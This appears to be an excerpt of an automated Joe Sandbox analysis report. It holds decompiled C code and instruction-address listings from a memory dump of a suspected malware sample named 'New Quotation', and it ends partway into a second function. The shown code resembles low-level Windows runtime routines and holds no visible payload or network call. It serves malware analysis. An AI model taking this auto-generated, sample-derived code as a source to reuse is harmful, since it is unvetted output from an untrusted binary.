				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x1d8ac610);
				E1D827C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L1D7E2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E1D7E24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x1d8c67f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x1d8c67f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x1d8c67f0; // 0x0
							_t309 =  *0x1d8c67f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x18ef570
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E1D7FF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f0ad4
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E1D7E24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L1D7E2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L1D7E2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E1D7E24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L1D7E2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f0ad4
										E1D85C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f0ad4
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f0ad4
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E1D7FF1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x18ef570
									_t86 = _t255 + 0x10; // 0x18f0ad4
									 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E1D7E3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f0ad4
										_t250 = E1D85C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E1D7FF1DB(_t250);
									_t228 = E1D7FF1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x18f0ad4
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}
































                                                                                                                                                                                          0x1d7fee48
                                                                                                                                                                                          0x1d7fee4a
                                                                                                                                                                                          0x1d7fee4f
                                                                                                                                                                                          0x1d7fee54
                                                                                                                                                                                          0x1d7fee56
                                                                                                                                                                                          0x1d7fee5b
                                                                                                                                                                                          0x1d7fee60
                                                                                                                                                                                          0x1d7fee63
                                                                                                                                                                                          0x1d7fee66
                                                                                                                                                                                          0x1d7fee68
                                                                                                                                                                                          0x1d7fee70
                                                                                                                                                                                          0x1d7fee73
                                                                                                                                                                                          0x1d7fee76
                                                                                                                                                                                          0x1d7fee79
                                                                                                                                                                                          0x1d7fee80
                                                                                                                                                                                          0x1d7fee85
                                                                                                                                                                                          0x1d7fee88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fee8b
                                                                                                                                                                                          0x1d7fee93
                                                                                                                                                                                          0x1d7fee98
                                                                                                                                                                                          0x1d7fee9f
                                                                                                                                                                                          0x1d7feeac
                                                                                                                                                                                          0x1d7feeb8
                                                                                                                                                                                          0x1d7feeb8
                                                                                                                                                                                          0x1d7feebe
                                                                                                                                                                                          0x1d7feec6
                                                                                                                                                                                          0x1d7feec9
                                                                                                                                                                                          0x1d7feec9
                                                                                                                                                                                          0x1d7feece
                                                                                                                                                                                          0x1d7feece
                                                                                                                                                                                          0x1d7feece
                                                                                                                                                                                          0x1d7feece
                                                                                                                                                                                          0x1d7feece
                                                                                                                                                                                          0x1d7feece
                                                                                                                                                                                          0x1d7feed3
                                                                                                                                                                                          0x1d7feed6
                                                                                                                                                                                          0x1d7feedb
                                                                                                                                                                                          0x1d7feee0
                                                                                                                                                                                          0x1d7feee6
                                                                                                                                                                                          0x1d7feeee
                                                                                                                                                                                          0x1d7feeee
                                                                                                                                                                                          0x1d7feef0
                                                                                                                                                                                          0x1d7feef4
                                                                                                                                                                                          0x1d7feef6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff1dc
                                                                                                                                                                                          0x1d7ff1dc
                                                                                                                                                                                          0x1d7feefc
                                                                                                                                                                                          0x1d7feefc
                                                                                                                                                                                          0x1d7fef01
                                                                                                                                                                                          0x1d7fef03
                                                                                                                                                                                          0x1d7fef06
                                                                                                                                                                                          0x1d7fef09
                                                                                                                                                                                          0x1d7fef0c
                                                                                                                                                                                          0x1d7fef0f
                                                                                                                                                                                          0x1d7fef0f
                                                                                                                                                                                          0x1d7fef16
                                                                                                                                                                                          0x1d7fef16
                                                                                                                                                                                          0x1d7fef1b
                                                                                                                                                                                          0x1d7fef20
                                                                                                                                                                                          0x1d7fef26
                                                                                                                                                                                          0x1d7fef29
                                                                                                                                                                                          0x1d7fef2c
                                                                                                                                                                                          0x1d7fef2c
                                                                                                                                                                                          0x1d7fef36
                                                                                                                                                                                          0x1d7fef36
                                                                                                                                                                                          0x1d7fef3b
                                                                                                                                                                                          0x1d7fef40
                                                                                                                                                                                          0x1d7fef46
                                                                                                                                                                                          0x1d7fef4c
                                                                                                                                                                                          0x1d7fef54
                                                                                                                                                                                          0x1d7fef57
                                                                                                                                                                                          0x1d7fef59
                                                                                                                                                                                          0x1d7fef60
                                                                                                                                                                                          0x1d7fef63
                                                                                                                                                                                          0x1d7fef63
                                                                                                                                                                                          0x1d7fef66
                                                                                                                                                                                          0x1d7fef69
                                                                                                                                                                                          0x1d7fef6c
                                                                                                                                                                                          0x1d7ff113
                                                                                                                                                                                          0x1d7ff113
                                                                                                                                                                                          0x1d7ff115
                                                                                                                                                                                          0x1d7ff122
                                                                                                                                                                                          0x1d7ff127
                                                                                                                                                                                          0x1d7ff12b
                                                                                                                                                                                          0x1d83fe64
                                                                                                                                                                                          0x1d83fe6a
                                                                                                                                                                                          0x1d83fe6a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff12b
                                                                                                                                                                                          0x1d7fef72
                                                                                                                                                                                          0x1d7fef74
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fef7a
                                                                                                                                                                                          0x1d7fef7d
                                                                                                                                                                                          0x1d7fef7d
                                                                                                                                                                                          0x1d7fef7d
                                                                                                                                                                                          0x1d7fef81
                                                                                                                                                                                          0x1d7ff144
                                                                                                                                                                                          0x1d7ff144
                                                                                                                                                                                          0x1d7ff14a
                                                                                                                                                                                          0x1d83fd20
                                                                                                                                                                                          0x1d83fd23
                                                                                                                                                                                          0x1d7fef90
                                                                                                                                                                                          0x1d7fef90
                                                                                                                                                                                          0x1d7fef93
                                                                                                                                                                                          0x1d83fd2e
                                                                                                                                                                                          0x1d83fd31
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fd37
                                                                                                                                                                                          0x1d83fd45
                                                                                                                                                                                          0x1d83fd4b
                                                                                                                                                                                          0x1d83fd4b
                                                                                                                                                                                          0x1d83fd4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fd54
                                                                                                                                                                                          0x1d83fd3c
                                                                                                                                                                                          0x1d83fd3f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fd3f
                                                                                                                                                                                          0x1d7fef99
                                                                                                                                                                                          0x1d7fef99
                                                                                                                                                                                          0x1d7fef9c
                                                                                                                                                                                          0x1d7ff1a6
                                                                                                                                                                                          0x1d7ff1a9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff1af
                                                                                                                                                                                          0x1d7fefa2
                                                                                                                                                                                          0x1d7fefa2
                                                                                                                                                                                          0x1d7fefa5
                                                                                                                                                                                          0x1d7fefab
                                                                                                                                                                                          0x1d7fefae
                                                                                                                                                                                          0x1d7fefb4
                                                                                                                                                                                          0x1d7fefba
                                                                                                                                                                                          0x1d7fefc0
                                                                                                                                                                                          0x1d7fefc6
                                                                                                                                                                                          0x1d7fefcc
                                                                                                                                                                                          0x1d7fefd8
                                                                                                                                                                                          0x1d7fefde
                                                                                                                                                                                          0x1d7fefe1
                                                                                                                                                                                          0x1d7fefe7
                                                                                                                                                                                          0x1d7fefe9
                                                                                                                                                                                          0x1d7fefec
                                                                                                                                                                                          0x1d7feff3
                                                                                                                                                                                          0x1d7feff8
                                                                                                                                                                                          0x1d7feffa
                                                                                                                                                                                          0x1d7fefff
                                                                                                                                                                                          0x1d7ff002
                                                                                                                                                                                          0x1d7ff008
                                                                                                                                                                                          0x1d7ff00a
                                                                                                                                                                                          0x1d7ff15d
                                                                                                                                                                                          0x1d7ff164
                                                                                                                                                                                          0x1d7ff165
                                                                                                                                                                                          0x1d7ff168
                                                                                                                                                                                          0x1d7ff16b
                                                                                                                                                                                          0x1d7ff16e
                                                                                                                                                                                          0x1d7ff170
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff176
                                                                                                                                                                                          0x1d7ff17a
                                                                                                                                                                                          0x1d7ff1c8
                                                                                                                                                                                          0x1d7ff1cf
                                                                                                                                                                                          0x1d7ff1d0
                                                                                                                                                                                          0x1d7ff1d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff1d3
                                                                                                                                                                                          0x1d7ff17c
                                                                                                                                                                                          0x1d7ff105
                                                                                                                                                                                          0x1d7ff105
                                                                                                                                                                                          0x1d7ff108
                                                                                                                                                                                          0x1d7ff10a
                                                                                                                                                                                          0x1d7ff1b7
                                                                                                                                                                                          0x1d7ff1b7
                                                                                                                                                                                          0x1d7ff110
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff110
                                                                                                                                                                                          0x1d7ff010
                                                                                                                                                                                          0x1d7ff010
                                                                                                                                                                                          0x1d7ff013
                                                                                                                                                                                          0x1d7ff0a2
                                                                                                                                                                                          0x1d7ff0a2
                                                                                                                                                                                          0x1d7ff0a6
                                                                                                                                                                                          0x1d7ff186
                                                                                                                                                                                          0x1d7ff186
                                                                                                                                                                                          0x1d7ff0ac
                                                                                                                                                                                          0x1d7ff0b0
                                                                                                                                                                                          0x1d83fe56
                                                                                                                                                                                          0x1d83fe56
                                                                                                                                                                                          0x1d7ff103
                                                                                                                                                                                          0x1d7ff103
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff103
                                                                                                                                                                                          0x1d7ff0bc
                                                                                                                                                                                          0x1d7ff0c3
                                                                                                                                                                                          0x1d7ff0c4
                                                                                                                                                                                          0x1d7ff0c7
                                                                                                                                                                                          0x1d7ff0ce
                                                                                                                                                                                          0x1d83fe35
                                                                                                                                                                                          0x1d83fe35
                                                                                                                                                                                          0x1d83fe39
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fe41
                                                                                                                                                                                          0x1d83fe41
                                                                                                                                                                                          0x1d83fe42
                                                                                                                                                                                          0x1d83fe48
                                                                                                                                                                                          0x1d83fe51
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fe51
                                                                                                                                                                                          0x1d7ff0d4
                                                                                                                                                                                          0x1d7ff0db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff0e1
                                                                                                                                                                                          0x1d7ff0e5
                                                                                                                                                                                          0x1d7ff193
                                                                                                                                                                                          0x1d7ff199
                                                                                                                                                                                          0x1d7ff19b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff0f4
                                                                                                                                                                                          0x1d7ff0f4
                                                                                                                                                                                          0x1d7ff0f8
                                                                                                                                                                                          0x1d7ff0fa
                                                                                                                                                                                          0x1d7ff0fd
                                                                                                                                                                                          0x1d83fe1e
                                                                                                                                                                                          0x1d83fe21
                                                                                                                                                                                          0x1d83fe24
                                                                                                                                                                                          0x1d83fe27
                                                                                                                                                                                          0x1d83fe2a
                                                                                                                                                                                          0x1d83fe2d
                                                                                                                                                                                          0x1d83fe2d
                                                                                                                                                                                          0x1d7ff0fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff0f8
                                                                                                                                                                                          0x1d7ff0eb
                                                                                                                                                                                          0x1d7ff0ee
                                                                                                                                                                                          0x1d7ff0f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff0f1
                                                                                                                                                                                          0x1d7ff01c
                                                                                                                                                                                          0x1d7ff01f
                                                                                                                                                                                          0x1d7ff02a
                                                                                                                                                                                          0x1d7ff02d
                                                                                                                                                                                          0x1d7ff030
                                                                                                                                                                                          0x1d7ff034
                                                                                                                                                                                          0x1d7ff036
                                                                                                                                                                                          0x1d7ff039
                                                                                                                                                                                          0x1d7ff045
                                                                                                                                                                                          0x1d7ff051
                                                                                                                                                                                          0x1d7ff05a
                                                                                                                                                                                          0x1d7ff05a
                                                                                                                                                                                          0x1d7ff05d
                                                                                                                                                                                          0x1d7ff060
                                                                                                                                                                                          0x1d7ff062
                                                                                                                                                                                          0x1d83fd59
                                                                                                                                                                                          0x1d83fd5c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fd62
                                                                                                                                                                                          0x1d83fd66
                                                                                                                                                                                          0x1d83fd72
                                                                                                                                                                                          0x1d83fd84
                                                                                                                                                                                          0x1d83fd8a
                                                                                                                                                                                          0x1d83fd8d
                                                                                                                                                                                          0x1d83fd90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83fd90
                                                                                                                                                                                          0x1d83fd68
                                                                                                                                                                                          0x1d83fd6c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff068
                                                                                                                                                                                          0x1d7ff068
                                                                                                                                                                                          0x1d7ff068
                                                                                                                                                                                          0x1d7ff06d
                                                                                                                                                                                          0x1d83fd98
                                                                                                                                                                                          0x1d83fda8
                                                                                                                                                                                          0x1d83fdae
                                                                                                                                                                                          0x1d83fdae
                                                                                                                                                                                          0x1d7ff073
                                                                                                                                                                                          0x1d7ff078
                                                                                                                                                                                          0x1d7ff07a
                                                                                                                                                                                          0x1d83fdbf
                                                                                                                                                                                          0x1d7ff080
                                                                                                                                                                                          0x1d7ff080
                                                                                                                                                                                          0x1d7ff080
                                                                                                                                                                                          0x1d7ff085
                                                                                                                                                                                          0x1d7ff088
                                                                                                                                                                                          0x1d83fde1
                                                                                                                                                                                          0x1d83fde4
                                                                                                                                                                                          0x1d83fde4
                                                                                                                                                                                          0x1d7ff08e
                                                                                                                                                                                          0x1d7ff095
                                                                                                                                                                                          0x1d7ff09d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff09d
                                                                                                                                                                                          0x1d7ff062
                                                                                                                                                                                          0x1d83fd29
                                                                                                                                                                                          0x1d7ff150
                                                                                                                                                                                          0x1d7ff153
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff155
                                                                                                                                                                                          0x1d7fef87
                                                                                                                                                                                          0x1d7fef8a
                                                                                                                                                                                          0x1d7ff136
                                                                                                                                                                                          0x1d7ff13c
                                                                                                                                                                                          0x1d7ff13e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ff13e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fef8a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9a561b7a3d59f2930343d8ca1097c2241cb8d12e130a592e27849e45191085b9
                                                                                                                                                                                          • Instruction ID: 6bd0b1ab5b216539c5f37880db88014d65ef223186672577e4548d6b17ed1c33
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a561b7a3d59f2930343d8ca1097c2241cb8d12e130a592e27849e45191085b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1E1D075D00648DFCB25CFA9D984A9DFBF1BF48720F10492AE569A7360DB70A844CF92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E6FE0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E1D7E6FE0(signed char __ecx, signed int __edx, signed int _a4, unsigned int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed short _v48;
				char _v49;
				signed int _v56;
				char _v57;
				char _v58;
				signed char _v59;
				char _v60;
				char _v61;
				signed int _v68;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed short _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				signed short _v110;
				char _v111;
				signed int _v116;
				signed int _v120;
				signed char _v124;
				signed int _v128;
				signed short _v130;
				signed short _v132;
				signed short _v134;
				signed short _v136;
				signed int _v140;
				signed short _v144;
				signed short _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				short* _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed short _v196;
				unsigned int* _v200;
				intOrPtr _v204;
				signed int _v208;
				signed short _v212;
				signed int _v216;
				signed int _v220;
				signed char _v224;
				unsigned int* _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				char _v256;
